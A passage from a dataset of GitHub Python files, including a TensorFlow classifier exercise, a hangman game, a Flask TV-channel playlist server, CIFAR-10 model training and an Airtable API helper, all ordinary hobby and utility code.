\"C\"):\n\t\treturn \"BC\"\n\n\tif (routeMap[origin] == \"A\" and routeMap[dest] == \"C\") or (routeMap[origin] == \"C\" and routeMap[dest] == \"A\"):\n\t\treturn \"ABC\"\n\n\treturn \"\"\n\n\nstationA = [\"Green Park\", \"Holdborn\"]\nstationB = [\"Mile End\", \"Bow Road\"]\nstationC = [\"Forest Hill\", \"Balham\"]\n\n# origin = \"Forest Hill\"\n\n# dest = \"Green Park\"\n\norigin = \"Forest Hill1\"\n\ndest = \"Green Park\"\n\nprint(solution(stationA, stationB, stationC, origin, dest))\n","repo_name":"ganeshparsads/OAs","sub_path":"roblox/station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33745618012","text":"\"\"\"\n@ binary classification using wide 2-layered net implemented with tensorflow\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport time\nimport os.path\n\ndef loadSamples(m, fileName):\n if not os.path.exists(fileName):\n return generateSamples(m, fileName)\n\n with open(fileName, 'r') as f:\n lines = f.readlines()\n\n X = []\n for line in lines[:-1]:\n X.append(line.split())\n\n Y = lines[-1].split()\n\n return [np.array(X, dtype=np.float128), np.array(Y, dtype=int)]\n\ndef saveSamples(X, Y, fileName):\n lines = \"\"\n\n for i in range(len(X)):\n for j in range(len(X[0])):\n lines += str(X[i][j]) + \" \"\n \n lines = lines[:-1] + \"\\n\"\n\n for i in range(len(Y)):\n lines += str(Y[i]) + \" \"\n lines = lines[:-1]\n\n with open(fileName, 'w') as f:\n f.write(lines)\n\ndef generateSamples(m, fileName):\n x1, x2, y = [], [], []\n\n for i in range(m):\n x1.append(random.uniform(-10, 10))\n x2.append(random.uniform(-10, 10))\n\n if x1[-1] + x2[-1] > 0:\n y.append(1)\n else:\n y.append(0)\n\n X = np.array([x1, x2])\n Y = np.array(y)\n\n saveSamples(X, Y, fileName)\n\n return X, Y\n\n\"\"\"\nInput: 2-dim vector, ЁЭТЩ = {ЁЭСе1, ЁЭСе2}\nOutput: label of the input, y тИИ {0,1}\n\"\"\"\nm = 10000 # the number of train sample\nn = 500 # the number of test sample\nK = 5000 # the number of update\n\nX_train, Y_train = loadSamples(m, \"train_samples.txt\")\nX_test, Y_test = loadSamples(n, \"test_samples.txt\")\n\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Dense(3, input_shape = [2,], activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\n\nmodel.compile(optimizer='sgd', loss = 'binary_crossentropy', metrics=['accuracy'])\n# model.compile(optimizer='sgd', loss = 'mse', metrics=['accuracy'])\n# model.compile(optimizer='RMSprop', loss = 'binary_crossentropy', metrics=['accuracy'])\n# model.compile(optimizer='adam', loss = 'binary_crossentropy', metrics=['accuracy'])\n\nstart = time.time()\n# model.fit(X_train.T, Y_train, epochs=K, verbose = 0)\n# model.fit(X_train.T, Y_train, epochs=K, verbose = 0, batch_size = 4)\n# model.fit(X_train.T, Y_train, epochs=K, verbose = 0, batch_size = 32)\nmodel.fit(X_train.T, Y_train, epochs=K, verbose = 0, batch_size = 128)\n\nprint(\"train time :\", time.time() - start)\n\nmodel.evaluate(X_train.T, Y_train, verbose=2)\nmodel.evaluate(X_test.T, Y_test, verbose=2)","repo_name":"unae131/DeepLearning","sub_path":"practice3.py","file_name":"practice3.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39564825212","text":"from mongoengine import *\nfrom spaceone.core.model.mongo_model import MongoModel\n\n\nclass Provider(MongoModel):\n provider = StringField(max_length=40, unique=True)\n name = StringField(max_length=255)\n template = DictField()\n metadata = DictField()\n capability = DictField()\n tags = DictField()\n created_at = DateTimeField(auto_now_add=True)\n\n meta = {\n 'updatable_fields': [\n 'name',\n 'template',\n 'metadata',\n 'capability',\n 'tags'\n ],\n 'minimal_fields': [\n 'provider',\n 'name'\n ],\n 'ordering': ['created_at'],\n 'indexes': [\n # 'provider',\n ]\n }\n","repo_name":"cloudforet-io/identity","sub_path":"src/spaceone/identity/model/provider_model.py","file_name":"provider_model.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"4352639131","text":"from utils import circle_to_oval\nfrom collections import deque\nfrom tkinter import Canvas\nfrom utils import distance_eucl, vec_2D\n\ndef pos_suiv(xi:float, yi: float, xj_1: float, yj_1: float, dist:float):\n \"\"\" Calcul de la position des boules\"\"\"\n # Comme la distance est une constante on la passe\n # directement en parametre\n # On normalise le vecteur unitaire\n u = vec_2D(xi, yi, xj_1, yj_1)\n norm = distance_eucl(xi, yi, xj_1, yj_1)\n # On applique la distance constante\n u = dist*u[0]/norm, dist*u[1]/norm\n # On soustrait pour obtenir la bonne position\n return xj_1-u[0], yj_1-u[1]\n\n\n\nclass Chenille_2D:\n def __init__(self, x0: float, y0: float, size:int, canva: Canvas, cote: int) -> None:\n self.size = size\n # Nombre de boules\n if size <= 0:\n raise ValueError(\"Chenille trop petite\")\n # Canvas\n self.Canva = canva\n if canva is None:\n raise ValueError(\"Canvas non initialisé\")\n # Taille du carre dans le canvas\n self.cote = cote\n if cote is None:\n raise ValueError(\"taille des carrés non initialisée\")\n # Tableau pour stocker l'id des boules\n self.chenille_id =[]\n # File pour récupérer les point des bézier courants\n self.flux = deque()\n # Distance constantes entre chaque boules\n self.dcst = []\n self.pos = []\n # Position des boules\n # Initialisation des boules\n x0, y0 = x0-2, y0-2\n for i in range(self.size):\n dist = 1*i*0.05+0.175\n rayon = dist*self.cote\n xy_xy = circle_to_oval(x0*self.cote+self.cote/2, y0*self.cote+self.cote/2, rayon)\n self.chenille_id.append((self.Canva.create_oval(*xy_xy, fill=\"Green\", state=\"normal\", tags=\"chenille\")))\n self.pos.append((x0, y0))\n self.dcst.append(dist)\n \n \n def deplacement(self, xj_1: float, yj_1: float):\n \"\"\"\n Calcule les déplacements relatifs entre tous les points dans\n le flux\n \"\"\"\n # Déplacement de la tête\n # Calcul du vecteur tête\n dx, dy = xj_1-self.pos[-1][0], yj_1-self.pos[-1][1]\n # On multiplie par la taille des carres pour avoir les bons repères\n self.Canva.move(self.chenille_id[-1],dx *self.cote, dy*self.cote)\n self.pos[-1] = xj_1, yj_1\n idx = -2\n while(idx > (-self.size)-1):\n # On récupère la position de la prochaine boule\n xj_1, yj_1 = self.pos[idx+1]\n xi, yi = self.pos[idx]\n cste = self.dcst[idx]\n # On calcule la position de la prochaine boule\n xj, yj = pos_suiv(xi, yi, xj_1, yj_1, cste)\n self.pos[idx] = xj, yj\n dx, dy = xj-xi, yj-yi\n self.Canva.move(self.chenille_id[idx], dx *self.cote, dy*self.cote)\n \n idx -= 1\n\n def delete(self):\n self.Canva.delete(\"chenille\")\n self.chenille_id = []\n self.pos = []\n self.dcst = []\n self.Canva = None\n\n \n\n \n\n\n","repo_name":"oliveur83/projet","sub_path":"chemin le plus court/chenille_2D.py","file_name":"chenille_2D.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35647049949","text":"from ..graphics import Canvas\nfrom ..graphics.shapes import Text, Square\n\nclass Legend (Canvas):\n def __init__ (self, **attr):\n Canvas.__init__ (self, **attr)\n if attr.has_key ('textHeight'):\n self.textHeight = attr['textHeight']\n else:\n self.textHeight = 10\n self.side1 = 0\n self.side2 = 0\n #self.lineWidth = self.width / 2.0 - 30.0\n self.height = 0.0\n self.lineWidth = self.width - 30\n \n def addKey (self, key, color):\n currentX = 0.0\n s = Square (8, x = currentX + 10, y = self.height)\n s.style.fill = color\n self.draw (s)\n line = Text (text = key,\n x = currentX + 20,\n y = self.height,\n textHeight = self.textHeight,\n lineLength = self.lineWidth,\n maxLines = 2,\n direction = 'forward',\n )\n self.draw (line)\n self.height += line.height + 3\n \"\"\"if self.side1 <= self.side2:\n currentX = 0\n yValue = self.side1\n else:\n currentX = self.width / 2.0\n yValue = self.side2\n s = Square (8, x = currentX + 10, y = yValue)\n s.style.fill = color\n self.draw (s)\n line = Text (text = key,\n x = currentX + 20,\n y = yValue,\n textHeight = self.textHeight,\n lineLength = self.lineWidth,\n direction = 'forward',\n )\n if self.side1 <= self.side2:\n self.side1 += line.height + 3\n else:\n self.side2 += line.height + 3\n self.draw (line)\n self.height = max (self.side1, self.side2)\"\"\"\n","repo_name":"dotskapes/dotSkapes","sub_path":"modules/savage/graph/legend.py","file_name":"legend.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"36745522210","text":"import logging\n\nimport flask\nfrom flask import Response\n\nfrom lebanese_channels.channel_ids import CHANNEL_LIST\nfrom lebanese_channels.display_item import DisplayItem\n\napp = flask.Flask(__name__)\n\nlogger = logging.getLogger(__name__)\n\n\n@app.route('/channel/')\ndef channel_route_default(name):\n return __channel_stream(name)\n\n\n@app.route('/channels')\ndef channels_route_default():\n return __get_channels_response_lines(flask.request.url_root, flask.request.args.get('format'))\n\n\ndef __channel_stream(target):\n for channel in CHANNEL_LIST:\n if channel.get_route_name() == target:\n url = channel.get_stream_url()\n return flask.redirect(url, code=302)\n\n\ndef __get_channels_response_lines(host: str, result_format: str) -> Response:\n display_items = []\n\n for channel in CHANNEL_LIST:\n url = host + 'channel/' + channel.get_route_name()\n display_items.append(\n DisplayItem(channel.get_route_name(), channel.get_name(), url, channel.get_logo()))\n\n if result_format is None or result_format == 'm3u8':\n response_list = ['#EXTM3U']\n for display_item in display_items:\n response_list.append('#EXTINF:-1'\n + ' tvg-id=\"' + display_item.channel_short_name + '\"'\n + ' tvg-logo=\"' + display_item.channel_logo + '\"'\n + ', ' + display_item.channel_name\n + '\\n'\n + display_item.channel_url)\n\n return Response('\\n'.join(response_list), mimetype='application/vnd.apple.mpegurl')\n elif result_format == 'html':\n response_list = []\n\n response_list.append('')\n response_list.append('')\n\n response_list.append('')\n response_list.append('Channel List')\n response_list.append('')\n\n response_list.append('')\n response_list.append('')\n response_list.append('')\n response_list.append('')\n return Response('\\n'.join(response_list), mimetype='text/html')\n else:\n return Response('Unknown Format', mimetype='text/plain')\n","repo_name":"ChadiEM/Lebanese-Channels","sub_path":"lebanese_channels/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"30610893825","text":"# DATE: 10/09/2022, 05:55:16\n# PROBLEM NAME: The Great Run\n# PROBLEM URL: https://www.codechef.com/problems/PROC18A\n# PROBLEM DIFFICULTY RATTING: 1097\n# STATUS: accepted\n# TIME: 0.02\n# MEMORY: 9.6M\n\nfor _ in range(int(input())):\r\n n, k = map(int, input().split())\r\n g = list(map(int, input().split()))\r\n max_g = 0\r\n for i in range(n-1):\r\n total = sum(g[i:k+i])\r\n if total > max_g:\r\n max_g = total\r\n\r\n print(max_g)\r\n\r\n\n\n","repo_name":"Yash2003Bisht/ProblemSolutions","sub_path":"solutions/codechef/PROC18A/PROC18A_1.py","file_name":"PROC18A_1.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3705591911","text":"import cv2\nimport numpy as np\n\nimage = cv2.imread( 'test.jpg' )\n\nsamples = image.reshape( ( -1 , 3 ) )\nsamples = np.float32( samples )\n\nK = 8\ncriteria = ( cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER , 10 , 1.0 )\nattempts = 10\nflags = cv2.KMEANS_RANDOM_CENTERS\n\nretval, bestLabels, centers = cv2.kmeans( samples , K , None , criteria , attempts , flags )\n\ncenters = np.uint8( centers )\nresult = centers[ bestLabels.flatten() ]\nresults = result.reshape( ( image.shape ) )\n\ncv2.imshow( 'K-Means Clustering' , results )\n\ncv2.waitKey( 0 )\ncv2.destroyAllWindows()\n","repo_name":"sangyoon/opencv","sub_path":"python/ColorQuantization.py","file_name":"ColorQuantization.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16104619597","text":"\nimport random\nimport string\n\n\"\"\"from operator import truediv\nimport random\n\n\nclass Hangman:\n def __init__(self, word_list, num_lives=5):\n pass\n # initiaise wordlist \n word_list=[]\n self.word_list=word_list\n # initialise numlives\n num_lives=5\n # initialise word\n word=\"\"\n # initialise word guessed \n word_guessed=[]\n self.word_guessed=word_guessed\n # initialise numlives \n self.num_lives=num_lives\n # initialise list letters \n list_letters=[]\n print(\"The mystery word has {len(self.word)} characters\")\n print(word_guessed)\n\n def check_letter(self, letter):\n pass\n # change letter to lowercase and assign to variable called letter\n #%%\n letter=letter.lower()\n # check if the letter is in the word: \n # print (letter is in the word)\n if letter in word:\n print(\"letter is in the word\")\n\n for i in word:\n if letter==word[i]:\n word[i]=letter\n print(word)\n \"\"\"\"\"\"\n else:\n num_lives=num_lives-1\n list_letters= list_letters.append(letter)\n\n #range function, letter = index of word\n # \n\n\n\n\n\n # create a for loop that checks for the position and character of the letters in the word:\n #check if the character == letter:\n # assign the letter to the word guessed at that position\n #print the word guessed \n # reduce the numbr of letters by 1 \n #else:\n #reduce number of lives by 1\n # append the letter into the list of letters \n\n\n\n \n\n\n def ask_letter(self):\n pass\n #take an input from the user and asssign it to letter\n #%%\n \n letter=input(\"Please enter a letter\")\n #check if len(letter)!=1 and not letter.isalpha: \n # enter the correct input\n if len(letter)!=1 or not letter.isalpha:\n letter=input(\"Please, enter just one character\")\n #check if the letter has been already tried (in the list of letters):\n # print (that letter has already been tried)\n if letter in list_letters:\n print( \"the letter\" + letter + \"has already been tried\")\n letter=input(\"Please enter a single letter that you have not already tried\")\n #call check letter method (letter as an argument) \n check_letter(letter)\n \n\ndef play_game(word_list):\n # create an instance of the class\n ask_letter(self)\n \n pass\n game = Hangman(word_list, num_lives=5)\n\nif __name__ == '__main__':\n word_list = ['apple', 'banana', 'orange', 'pear', 'strawberry', 'watermelon']\n play_game(word_list)\n\n\"\"\"\n\n\n\n\n\n#milestone 2\n#word_list = ['apple','banana','kiwi','avocado','orange']\n#print(word_list)\n#word = random.choice(word_list)\n#print(word)\n\"\"\"guess = input(\"Please enter a character\")\nprint(guess)\nif len(guess)==1 and guess.isalpha:\n print(\"good guess\")\nelse:\n print(\"Oops! That is not a valid input\")\"\"\"\n\n\n#milestone 3 \n\"\"\"\"\nwhile True:\n guess = input(\"Please enter a character\")\n if len(guess)==1 and guess.isalpha:\n print(\"good guess\")\n break\n else:\n print(\"Invalid letter. Please, enter a single alphabetical character.\")\n\nif guess in word:\n print(f\"Good guess! {guess} is in the word.\")\nelse:\n print(f\"Sorry, {guess} is not in the word. Try again\")\n\"\"\"\n\n\n\"\"\" while True:\n if len(guess)==1 and guess.isalpha and guess in word:\n print(f\"Good guess! {guess} is in the word.\")\n break\n elif len(guess)==1 and guess.isalpha and guess not in word:\n print(f\"Sorry, {guess} is not in the word. Try again\")\n else:\n print(\"Invalid letter. Please, enter a single alphabetical character.\")\"\"\"\n\n\n\n\"\"\"def check_guess(guess):\n guess = guess.lower()\n if guess in word:\n print(f\"Good guess! {guess} is in the word.\")\n else:\n print(f\"Sorry, {guess} is not in the word. Try again\")\ncheck_guess\n\ncheck_guess = check_guess(word)\n \n\ndef ask_for_input():\n while True:\n guess = input(\"Please enter a character \")\n if len(guess)==1 and guess.isalpha():\n print(\"good guess\")\n break\n else:\n print(\"Invalid letter. Please, enter a single alphabetical character.\")\n \n check_guess(guess)\n\nask_for_input()\"\"\"\n\n#works perfect until now\n#milestone 4\n\nclass Hangman:\n\n def __init__(self, word_list, num_lives):\n pass\n self.word = random.choice(word_list)\n self.word_guessed = [\"_\" * len(self.word)]\n self.num_letters = len(set(self.word))\n self.num_lives = num_lives\n self.word_list = word_list\n self.list_of_guesses = []\n #self.word_guessed2 = []\n\n print(f\"The mystery word has {len(self.word)} characters\")\n print(self.word_guessed)\n\n\n #creating method for checking letter\n def check_guess(self, guess):\n \n #guess = guess.lower() #redundant\n \n if guess in self.word:\n print(f\"Good guess! {guess} is in the word.\")\n \"\"\"for i in range(len(self.word)):\n if self.word[i]==guess:\n \n self.word_guessed.append(guess)\n print(self.word_guessed)\"\"\"\n for x, element in enumerate(self.word_guessed):\n if guess == element:\n self.word_guessed[x] = element\n \n #self.word_guessed2 = ' '.join(self.word_guessed)\n print(self.word_guessed)\n self.num_letters -=1\n else:\n self.num_lives -=1\n print(f\"Sorry, {guess} is not in the word. Try again\")\n print(f\"You have {self.num_lives} tries left\")\n\n self.list_of_guesses.append(guess)\n\n #method for input\n def ask_for_input(self):\n pass\n s = set(string.ascii_lowercase) #making a set of lower case alphabets for the elif statements\n while True:\n guess = input(\"Please enter a character \")\n guess = guess.lower() #converting into lowercase letters to compare to s\n if len(guess)!=1:\n print(\"Invalid letter. Please, enter a single alphabetical character\")\n elif guess not in s:\n print(\"Invalid letter. Please, enter a single alphabetical character\")\n elif guess in self.list_of_guesses:\n print(\"You already tried that letter!\")\n print(f\"The letters that you've tried are {self.list_of_guesses}\")\n else:\n print(f\"Your guess is {guess} \")\n #self.list_of_guesses.append(guess)\n self.check_guess(guess)\n break\n \n #ask_for_input()\n\ndef play_game(word_list, num_lives):\n \n game = Hangman(word_list, num_lives)\n while True:\n if game.num_lives == 0:\n print(\"you lost!\")\n print(f\"The word was {game.word}\")\n break\n elif game.num_letters > 0:\n game.ask_for_input()\n elif not game.num_letters >0 and game.num_lives != 0:\n print(\"congratulations\")\n print(f\"The word was {game.word}\")\n break\n else:\n break\n\n\nif __name__ == '__main__':\n while True:\n difficulty = int(input(\"Welcome to Hangman! Please Choose a difficulty - \\n Enter 1 for easy \\n Enter 2 for medium \\n enter 3 for hard\"))\n\n if difficulty == 1:\n word_list = ['apple', 'banana', 'orange', 'pear', 'strawberry', 'watermelon']\n play_game(word_list, num_lives=5)\n break\n elif difficulty == 2:\n word_list = ['switzerland', 'florence', 'lucknow']\n play_game(word_list, num_lives=4)\n break\n elif difficulty == 3:\n word_list = ['flabbergasted', 'indestructible']\n play_game(word_list, num_lives=3)\n break\n else:\n print(\"Invalid input\")\n \n\n \n \"\"\"\"\n while True:\n play_again = input(\"Please enter Y to play again at the same difficulty \\n Enter N to exit the game \\n if you want to change the difficulty please exit and re-start the game: \\n \").lower()\n if play_again == 'y':\n play_game(word_list, num_lives, j)\n \n elif play_again == 'n':\n print(\"Goodbye!\")\n break\n else:\n print(\"Invalid input\")\n\"\"\"\n \n\n\n# %%\n","repo_name":"anany14/Hangman","sub_path":"rough.py","file_name":"rough.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74751358224","text":"#######################\n# COMP432 - G01\n# Part 3 - Interpretability\n# INCOMPLETE - Models built, but no comparison\n#######################\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport torch\nfrom torchsummary import summary\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\ntrain_size = 0.8\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\n\n# Creating an instance\ndd = unpickle('Datasets/data_batch_1')\n\n# Showing the first image from data\nimg = dd[b'data'][0]\nimg.shape = (32, 32, 3)\nplt.imshow(img)\n\n# Reshaping the data and showing the result\nimg = img.reshape(3, 32, 32).transpose(1, 2, 0)\nplt.imshow(img)\n\nX = dd[b'data']\nY = np.array(dd[b'labels'])\nY.shape\n\n# In the first step we will split the data in training and remaining dataset\nx_train, x_test, y_train, y_test = train_test_split(X, Y, train_size=train_size)\n\n## Model-Creation,Training & Visualization\ndc = DecisionTreeClassifier(max_depth=100, random_state=0, splitter='random')\ndc.fit(x_train, y_train)\n\n\ndef train_estimators(X, y, estimator_type, **kwargs):\n clf = estimator_type(random_state=0, **kwargs)\n clf.fit(X, y)\n return clf\n\n\ndef plot_estimator_scores(estimator, **kwargs):\n \"\"\"\n Plots the training, validation, and testing scores of a list of estimators,\n where `param_name` and `param_vals` are the same as for `train_estimators`.\n The estimator with best validation score will be highlighted with an 'x'.\n \"\"\"\n # Your implementation here. Use as many lines as you need. \n x = 1\n list_tr = []\n list_tst = []\n list_val = []\n list_par_val = []\n estimtr = 0\n s = -4\n s1 = -2\n for i in range(1, 6):\n if estimator == DecisionTreeClassifier or estimator == RandomForestClassifier:\n estimtr = train_estimators(x_train, y_train, estimator, max_depth = i*5*x)\n elif estimator == LogisticRegression:\n estimtr = train_estimators(x_train, y_train, estimator, C=10**s,max_iter=10000)\n s = s + 1\n elif estimator == SVC:\n estimtr = train_estimators(x_train, y_train, estimator, C=10**s1,max_iter=10000,gamma=0.001)\n s1 = s1 + 1\n\n list_tr.append(score_estimators(x_train, y_train, estimtr))\n list_tst.append(score_estimators(x_test, y_test, estimtr))\n list_par_val.append(i * 5 * x)\n x = x + 1\n\n plt.plot(list_par_val, list_tr, label='training')\n plt.scatter(list_par_val, list_tr,)\n plt.plot(list_par_val, list_tst, label='testing')\n plt.scatter(list_par_val, list_tst)\n\n plt.legend()\n return list_tr, list_tst, list_val\n\n\ndef score_estimators(X, y, estimator):\n \"\"\"Scores each estimator on (X, y), returning a list of scores.\"\"\"\n # Your implementation here. Aim for 1-4 lines.\n return estimator.score(X, y)\n\n\nplot_estimator_scores(DecisionTreeClassifier)\n\n\n## Convolution Neural Network\n# number of subprocesses to use for data loading\nnum_workers = 0\n# how many samples per batch to load\nbatch_size = 20\n# percentage of training set to use as validation\nvalid_size = 0.2\n\n# convert data to a normalized torch.FloatTensor\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n# choose the training and test datasets\ntrain_data = datasets.CIFAR10('data', train=True,\n download=True, transform=transform)\ntest_data = datasets.CIFAR10('data', train=False,\n download=True, transform=transform)\n\n# obtain training indices that will be used for validation\nnum_train = len(train_data)\nindices = list(range(num_train))\nnp.random.shuffle(indices)\nsplit = int(np.floor(valid_size * num_train))\ntrain_idx, valid_idx = indices[split:], indices[:split]\n\n# define samplers for obtaining training and validation batches\ntrain_sampler = SubsetRandomSampler(train_idx)\nvalid_sampler = SubsetRandomSampler(valid_idx)\n\n# prepare data loaders (combine dataset and sampler)\ntrain_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size, sampler=train_sampler, num_workers=num_workers)\nvalid_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size, sampler=valid_sampler, num_workers=num_workers)\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size, num_workers=num_workers)\n\n# specify the image classes\nclasses = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n\ntrain_on_gpu = False\n\n\n# define the CNN architecture\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # convolutional layer (sees 32x32x3 image tensor)\n self.conv1 = nn.Conv2d(3, 16, 3, padding=1)\n # convolutional layer (sees 16x16x16 tensor)\n self.conv2 = nn.Conv2d(16, 32, 3, padding=1)\n # convolutional layer (sees 8x8x32 tensor)\n self.conv3 = nn.Conv2d(32, 64, 3, padding=1)\n # max pooling layer\n self.pool = nn.MaxPool2d(2, 2)\n # linear layer (64 * 4 * 4 -> 500)\n self.fc1 = nn.Linear(64 * 4 * 4, 500)\n # linear layer (500 -> 10)\n self.fc2 = nn.Linear(500, 10)\n # dropout layer (p=0.25)\n self.dropout = nn.Dropout(0.25)\n\n def forward(self, x):\n # add sequence of convolutional and max pooling layers\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = self.pool(F.relu(self.conv3(x)))\n # flatten image input\n x = x.view(-1, 64 * 4 * 4)\n # add dropout layer\n x = self.dropout(x)\n # add 1st hidden layer, with relu activation function\n x = F.relu(self.fc1(x))\n # add dropout layer\n x = self.dropout(x)\n # add 2nd hidden layer, with relu activation function\n x = self.fc2(x)\n return x\n\n# create a complete CNN\nmodel = Net()\nprint(model)\n\n# move tensors to GPU if CUDA is available\nif train_on_gpu:\n model.cuda()\n\nsummary(model, (3, 32, 32))\n\n# specify loss function (categorical cross-entropy)\ncriterion = nn.CrossEntropyLoss()\n\n# specify optimizer\noptimizer = optim.SGD(model.parameters(), lr=0.01)\n\n\n## Train the Network\n# Remember to look at how the training and validation loss decreases over time; if the validation loss ever increases it indicates possible overfitting. (In fact, in the below example, we could have stopped around epoch 33 or so!)\n# number of epochs to train the model\nn_epochs = 20\n\n# track change in validation loss\nvalid_loss_min = np.Inf\n\nfor epoch in range(1, n_epochs + 1):\n # keep track of training and validation loss\n train_loss = 0.0\n valid_loss = 0.0\n \n ###################\n # train the model #\n ###################\n model.train()\n for data, target in train_loader:\n\n optimizer.zero_grad()\n # forward pass: compute predicted outputs by passing inputs to the model\n output = model(data)\n # calculate the batch loss\n loss = criterion(output, target)\n # backward pass: compute gradient of the loss with respect to model parameters\n loss.backward()\n # perform a single optimization step (parameter update)\n optimizer.step()\n # update training loss\n train_loss += loss.item() * data.size(0)\n\n ###################### \n # validate the model #\n ######################\n model.eval()\n for data, target in valid_loader:\n\n output = model(data)\n # calculate the batch loss\n loss = criterion(output, target)\n # update average validation loss\n valid_loss += loss.item() * data.size(0)\n\n # calculate average losses\n train_loss = train_loss / len(train_loader.sampler)\n valid_loss = valid_loss / len(valid_loader.sampler)\n\n # print training/validation statistics\n print('Epoch: {} \\tTraining Loss: {:.6f} \\tValidation Loss: {:.6f}'.format(epoch, train_loss, valid_loss))\n\n # save model if validation loss has decreased\n if valid_loss <= valid_loss_min:\n print('Validation loss decreased ({:.6f} --> {:.6f}). Saving model ...'.format(valid_loss_min, valid_loss))\n torch.save(model.state_dict(), 'model_cifar.pt')\n valid_loss_min = valid_loss\n\n\n# ## Test the Trained Network\n# Test your trained model on previously unseen data! A \"good\" result will be a CNN that gets around 70% (or more, try your best!) accuracy on these test images.\n# track test loss\ntest_loss = 0.0\nclass_correct = list(0. for i in range(10))\nclass_total = list(0. for i in range(10))\nmodel.eval()\n# iterate over test data\nfor data, target in test_loader:\n # forward pass: compute predicted outputs by passing inputs to the model\n output = model(data)\n # calculate the batch loss\n loss = criterion(output, target)\n # update test loss\n test_loss += loss.item() * data.size(0)\n # convert output probabilities to predicted class\n _, pred = torch.max(output, 1)\n # compare predictions to true label\n correct_tensor = pred.eq(target.data.view_as(pred))\n correct = np.squeeze(correct_tensor.numpy()) if not train_on_gpu else np.squeeze(correct_tensor.cpu().numpy())\n # calculate test accuracy for each object class\n for i in range(batch_size):\n label = target.data[i]\n class_correct[label] += correct[i].item()\n class_total[label] += 1\n\n# average test loss\ntest_loss = test_loss / len(test_loader.dataset)\nprint('Test Loss: {:.6f}\\n'.format(test_loss))\n\nfor i in range(10):\n if class_total[i] > 0:\n print('Test Accuracy of %5s: %2d%% (%2d/%2d)' % (\n classes[i], 100 * class_correct[i] / class_total[i],\n np.sum(class_correct[i]), np.sum(class_total[i])))\n else:\n print('Test Accuracy of %5s: N/A (no training examples)' % (classes[i]))\n\nprint('\\nTest Accuracy (Overall): %2d%% (%2d/%2d)' % (\n 100. * np.sum(class_correct) / np.sum(class_total),\n np.sum(class_correct), np.sum(class_total)))\n","repo_name":"kyivedwards/MLAlgorithmComparator","sub_path":"Classifier interpretability/interpretability.py","file_name":"interpretability.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33906956134","text":"import requests\nfrom django.core.exceptions import PermissionDenied\n\nfrom seqr.utils.logging_utils import SeqrLogger\nfrom seqr.views.utils.terra_api_utils import is_google_authenticated\n\nfrom settings import AIRTABLE_API_KEY, AIRTABLE_URL\n\nlogger = SeqrLogger(__name__)\n\nPAGE_SIZE = 100\nMAX_OR_FILTERS = PAGE_SIZE - 5\n\n\nclass AirtableSession(object):\n\n RDG_BASE = 'RDG'\n ANVIL_BASE = 'AnVIL'\n AIRTABLE_BASES = {\n RDG_BASE: 'app3Y97xtbbaOopVR',\n ANVIL_BASE: 'appUelDNM3BnWaR7M',\n }\n\n def __init__(self, user, base=RDG_BASE):\n self._user = user\n self._check_user_access(base)\n self._url = f'{AIRTABLE_URL}/{self.AIRTABLE_BASES[base]}'\n\n self._session = requests.Session()\n self._session.headers.update({'Authorization': f'Bearer {AIRTABLE_API_KEY}'})\n\n def _check_user_access(self, base):\n has_access = is_google_authenticated(self._user)\n if base != self.ANVIL_BASE:\n has_access &= self._user.email.endswith('broadinstitute.org')\n if not has_access:\n raise PermissionDenied('Error: To access airtable user must login with Google authentication.')\n\n def safe_create_record(self, record_type, record):\n try:\n response = self._session.post(f'{self._url}/{record_type}', json={'records': [{'fields': record}]})\n response.raise_for_status()\n except Exception as e:\n logger.error(f'Airtable create \"{record_type}\" error: {e}', self._user)\n\n def fetch_records(self, record_type, fields, or_filters):\n self._session.params.update({'fields[]': fields, 'pageSize': PAGE_SIZE})\n filter_formulas = []\n for key, values in or_filters.items():\n filter_formulas += [f\"{key}='{value}'\" for value in sorted(values)]\n records = {}\n for i in range(0, len(filter_formulas), MAX_OR_FILTERS):\n 